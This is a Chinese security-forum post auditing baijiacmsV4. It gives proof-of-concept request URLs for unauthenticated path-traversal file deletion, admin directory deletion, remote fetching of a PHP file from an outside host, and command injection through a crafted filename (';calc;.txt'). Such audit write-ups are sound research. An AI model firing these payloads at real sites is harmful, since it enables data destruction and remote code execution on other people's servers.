安全矩阵

 找回密码
 立即注册
搜索
查看: 2577|回复: 0

baijiacmsV4代码审计

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-11-19 10:26:56 | 显示全部楼层 |阅读模式
原文链接:baijiacmsV4代码审计

baijiacmsV4代码审计!先熟悉下代码结构!
  1. addons     插件
  2. api        接口
  3. assets     静态文件
  4. attachment 上传目录
  5. cache      缓存目录
  6. config     系统配置文件
  7. include    系统文件
  8. system     后端代码
复制代码



个人将他们分成两部分!
一部分是 system本身!另一部分是eshop!

漏洞复现任意文件删除不需要admin权限
漏洞文件位置:
/system/eshop/core/mobile/util/uploader.php



看上图应该可以知道$operation $file 都可控!
跟进一下:file_delete()


$settings返回是空的!那就可以容易文件删除了!

poc
/index.php?mod=mobile&act=uploader&op=post&do=util&m=eshop&op=remove&file=../flag.txt
调试一下:

看到直接跳过了!

flag.txt已经删除了!

任意路径删除
需要后台权限!
system/manager/class/web/database.php

这点很好看!就判断了下 目录是否存在!然后删除目录!

poc
/index.php?mod=site&act=manager&do=database&op=delete&id=Li8uLi8uLi90ZXRl
删除后:


后台RCE漏洞文件:后台的:
/system/public/class/web/file.php


poc
/index.php?mod=site&act=public&do=file&op=fetch&url=http://xxx.xxxx.xxxx/aaa/1.php

写入成功:

RCE漏洞文件
/system/weixin/class/web/setting.php


$file_full_path直接传进了system!我们可以通过构造文件名来RCE!

但是image_compress_openscale是空!我们设置一下缩放!

设置完后:

我自己添加了个$a!来更清晰看出值!

poc
convert -quality 80 D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/;calc;.txt # D:/phpstudy_pro/WWW/baijiacms_v4_1_4_20170105 (2)/;calc;.txt #

但是出了意外!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 03:36 , Processed in 0.015394 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表